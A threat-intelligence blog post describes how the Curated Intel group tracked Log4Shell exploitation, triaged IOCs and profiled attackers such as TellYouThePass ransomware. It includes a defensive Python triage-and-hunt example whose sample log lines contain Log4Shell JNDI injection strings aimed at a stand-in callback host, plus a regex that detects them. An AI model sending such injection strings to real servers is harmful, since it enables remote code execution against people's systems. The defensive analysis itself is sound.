Nightmare Before Christmas - Curated Intel's Response To Log4Shell

 

Written by @BushidoToken and @TrevorGiffen | Edited by @SteveD3

Late on Thursday, 9 December, security researchers warned of a critical vulnerability with wide ramifications. With a CVSS score of 10.0 (Critical), CVE-2021-44228 is a remote code execution (RCE) vulnerability, dubbed Log4Shell. It lies in the Apache Log4j library, a Java-based logging tool that is widely used in applications the world over. This vulnerability allows an adversary who can control log messages to execute arbitrary code loaded from any threat actor-controlled servers.

Although we are currently seeing widespread mass exploitation, Curated Intel analysts anticipate that state actors and ransomware will use Log4Shell in the long term. This is because a multitude of Internet of Things (IoT) and operational technology (OT) products, like industrial control systems (ICS) and supervisory control and data acquisition (SCADA), all rely on Log4j and are likely to remain unpatched for quite some time. The UK NCSC highlights that Log4j, rather than being a single piece of software, is a software component that's used by millions of computers worldwide running online services, adding that this "makes Log4Shell potentially the most severe computer vulnerability in years." (12)

Curated Intel on the Case

Curated Intel is a private trust group of cyber threat intelligence (CTI) and digital forensics and incident response (DFIR) professionals, who share insights and monitor the threat landscape together. Our members come from diverse and varied backgrounds, and having a space to verify information with a 3rd, 4th, or 5th pair of eyes is very useful. This is especially true when a crisis like Log4Shell emerges, where rumours are plentiful and facts are scant.

Curated Intel members first identified the critical vulnerability in Log4j on 9 December and began investigating. After initially being skeptical of the hysterical tweets, we began to see more reports of active exploitation of a 0day in Minecraft. Further research uncovered additional software and platforms that use Log4j, and we quickly realized the broad impact Log4Shell would have on the Internet as a whole.

As a community, we wanted to raise awareness and alert other members of the issue. Curated Intel is not a large group, but we fortunately have a global membership of helpful and diligent analysts. Curated Intel is just one of several trust groups in the industry. However, we do hope that by documenting our experience of how we responded to Log4j, we can help other groups organize themselves and contribute to the wider community.

Curated Intel, like many other cybersecurity communities, relies on Discord for our messaging platform. Although some risks are certainly associated with Discord (which we won't go into now), it does the job we want it to. To respond to Log4Shell, we created two channels: one for any developments to the situation and one dedicated to indicators of compromise (IOCs) - more on those later - and we issued a server-wide advisory to all community members to begin investigating Log4Shell.

The members of Curated Intel quickly saw that there was no centralized public source of information regarding threats leveraging Log4Shell. Researchers had set up a number of GitHub repositories to track software impacted by Log4Shell, but none were tracking the malware or threat actors exploiting it. Therefore, Curated Intel created our Log4Shell-IOCs GitHub repository to begin tracking every malware, cybercriminal, and APT launching attacks on vulnerable Log4j instances.

Assessing the Scale

CISA's crowdsourced list says at least 566 software products from 91 technology vendors are possibly vulnerable, based on a review of 2199 software products. NCSC-NL's crowdsourced list says at least 454 software products from 99 technology vendors are possibly vulnerable, based on a review of 3394 software products. Swithak identified 106 software products that are vulnerable. All of these lists are continuously being updated and can be tracked in spreadsheet formats via our GitHub repository.

Researchers at Google reported that out of all the Java packages they scanned on Maven Central, up to 35,863 were affected by Log4j vulnerabilities - of which there are now four at the time of writing (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, and CVE-2021-45105). Log4Shell is not over yet, not by a long stretch.

Indicators of Compromise (IOCs)

IOCs quickly became a point of contention in the community and among CTI analysts trying to track and compile lists for ingestion into other security products to detect and prevent Log4Shell attacks. It seemed like every vendor was firing out lists of IOCs based on anything launching ${jndi:ldap requests. These IOCs included legitimate scans from researchers and national computer emergency response teams (CERTs), as well as the heaps of threat actors jumping on the bandwagon.

We immediately noticed the issue here: threat actors and researchers alike were using cheap or free virtual private servers (VPS) on large web hosting and cloud infrastructure services to launch Java Naming and Directory Interface (JNDI) attacks. To make matters worse, many legitimate sites were being spoofed for call-back domains. These two scenarios led to a high number of false positives which were added to lists of IOCs and, in some cases, may have caused outages when a certain cloud service provider was blocked.

As a result of this mayhem, Curated Intel analysts compiled low-to-medium confidence feeds of IOCs provided by vendors and researchers - with the caveat of not adding them to blocklists, but rather watchlists (aka hotlists) for continuous monitoring. These could then be useful for activities such as threat hunting to see which of the Log4Shell exploit sources targeted a network prior to a breach, for example.
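
The following Python example is added here and is not taken from the Curated Intel repository. It applies the watchlist-versus-blocklist approach described above: only vetted post-exploitation IOCs outside shared hosting become blocklist candidates, and everything else is kept for hunting through historical logs. The feed entries, the shared-hosting range, the log lines, and the field names confidence and stage are constructed assumptions.

```python
import ipaddress
import re

# Constructed sample data (RFC 5737 documentation addresses, not real IOCs).
SHARED_HOSTING = [ipaddress.ip_network("198.51.100.0/24")]  # assumed VPS/cloud range
FEED = [
    {"ip": "198.51.100.7", "confidence": "low", "stage": "scan"},
    {"ip": "203.0.113.9", "confidence": "high", "stage": "post-exploitation"},
    {"ip": "198.51.100.23", "confidence": "high", "stage": "post-exploitation"},
    {"ip": "192.0.2.44", "confidence": "medium", "stage": "scan"},
]
ACCESS_LOG = [
    '198.51.100.7 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"',
    '192.0.2.44 - - [10/Dec/2021:09:20:41 +0000] "GET /login HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '192.0.2.200 - - [11/Dec/2021:02:03:55 +0000] "GET /?q=${JNDI:ldap://callback.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)  # plain lookup form only

def in_shared_hosting(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SHARED_HOSTING)

def triage(feed):
    """Split a feed into a blocklist-candidate set and a watchlist set."""
    block, watch = set(), set()
    for ioc in feed:
        vetted = ioc["confidence"] == "high" and ioc["stage"] == "post-exploitation"
        # Shared cloud/VPS addresses stay on the watchlist even when vetted:
        # blocking them risks cutting off a legitimate provider.
        if vetted and not in_shared_hosting(ioc["ip"]):
            block.add(ioc["ip"])
        else:
            watch.add(ioc["ip"])
    return block, watch

def hunt(log_lines, watch):
    """Return (source_ip, on_watchlist, has_jndi_string) for lines worth review."""
    hits = []
    for line in log_lines:
        src = line.split(" ", 1)[0]
        listed, jndi = src in watch, bool(JNDI.search(line))
        if listed or jndi:
            hits.append((src, listed, jndi))
    return hits

if __name__ == "__main__":
    blocklist, watchlist = triage(FEED)
    print(blocklist, hunt(ACCESS_LOG, watchlist))
```

A source that appears on the watchlist without a JNDI string in the request is still returned, which is the case that matters when reconstructing who touched a network before a breach.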

Currently, in our GitHub repository, we have compiled sources of IOCs and provided a vetted list of high-fidelity IOCs that are focused on post-exploitation and were filtered by the Equinix Threat Analysis Center (ETAC)™️, as well as an unfiltered list of IOCs suited for MISP ingestion provided by the KPMG-EGYDE CTI team (which earned a shoutout by MISP itself!).

Curated Intel also compiled a list of Threat Reports covering malicious actors and malware leveraging Log4Shell in the wild. These reports add context to what and who is targeting vulnerable Log4j instances and can allow defenders to make their next-step decisions based on threat-informed defence. Curated Intel analysts also enriched the threat report data with additional information in the Threat Profiling table and the Threat Groups table.

Excellent reports were provided by respected organizations with some of the largest telemetries in the world and by experts in their domains. Getting the opinions of these industry leaders is highly valuable while responding to a growing threat that grabbed more headlines each passing day. 

Analysis

After one week of monitoring, it seemed that almost every major type of threat actor had tried their hand at Log4Shell exploitation. Widespread opportunistic attacks began with cryptomining malware and distributed denial of service (DDoS) bots - as they usually do when a critical vulnerability is disclosed that is trivial to exploit. This was shortly followed by ransomware such as Khonsari and TellYouThePass, commodity RATs such as Orcus, PowerShell or Bash reverse shells, and offensive security tools such as Cobalt Strike and Meterpreter.

Reports later emerged that multiple advanced persistent threat (APT) actors were leveraging Log4Shell, according to the Microsoft Threat Intelligence Center (MSTIC), CrowdStrike, and Mandiant. APT groups from China and Iran, tracked as Hafnium and Phosphorus respectively, alongside unnamed groups from Turkey and North Korea are launching state-aligned espionage campaigns. 

It has since been revealed that Russian-speaking organized cybercrime groups, such as the operators of Conti ransomware and the Dridex Trojan, have also begun to wield Log4Shell against organizations. The tactics, techniques, and procedures (TTPs) of these threat actors have been mapped to the MITRE ATT&CK framework and shared to the Curated Intel Log4Shell GitHub repository by ETAC analysts - see here.

Fig. 1 - ETAC analysis of cyber threats leveraging Log4Shell within the first week

Spotlight: TellYouThePass Ransomware

A Curated Intel investigation into one of the threats exploiting Log4Shell in the wild also received attention from the InfoSec media (see here and here). Analysts from China reported attacks on vulnerable Log4j instances, but none of the English-speaking world was paying attention. 

Further analysis of IOCs shared online by Curated Intel members revealed and confirmed that the TellYouThePass ransomware was indeed exploiting Log4Shell in the wild to target both Windows and Linux systems, particularly targeting systems in China. The ransomware is also capable of lateral movement through the theft of SSH credentials and OS credential dumping to propagate to other systems it can authenticate with on the local network.

Continuous Monitoring

Like any major cyber threat that is ongoing, CTI analysts perform the OODA Loop, which stands for Observe, Orient, Decide, Act. After Log4Shell was disclosed and attacks emerged, there was a vast amount of new information that was pushed online. Two main veins Curated Intel tapped were the new threats leveraging Log4Shell and useful IOCs shared online.

When a new malware was identified or a new APT was reported as actively leveraging Log4Shell, it was important to make others aware and try to understand, based on previous reports, the actions and objectives of such threats and how this new information may impact the response effort of the organizations we are protecting. 

While continuous monitoring does include checking open-source reports from social media, the mainstream news, and vendor blogs, it is also very useful to tap into closed sources such as what other Curated Intel members were seeing in their telemetry or what sources in other trust groups were reporting. As long as the Traffic Light Protocol (TLP) is adhered to by all parties, this type of intelligence could be vital to stopping a breach and should be encouraged.

Fig. 2 - Statistics of traffic to the Curated Intel GitHub repository as of 20 December 2021

Our GitHub repository has now been viewed over 35,000 times. We are very pleased with the idea that at least some of those visitors found our repository useful. Log4Shell will put many teams to the test this Christmas, especially with federal directives by CISA calling for a Christmas Eve deadline. Therefore, we hope that this resource has eased the pressure on some and helped others with their own intelligence collection and analysis plans.

Spreading the Word

As we presented our research and response effort to the public via GitHub and social media, we decided to spread the word. And as we did, national CERTs, CTI companies, the InfoSec media, and forums helped spread it too. Log4Shell is legitimately an information security crisis with an extremely broad attack surface and very long-lasting effects.

Curated Intel thanks the following organizations for spreading the word: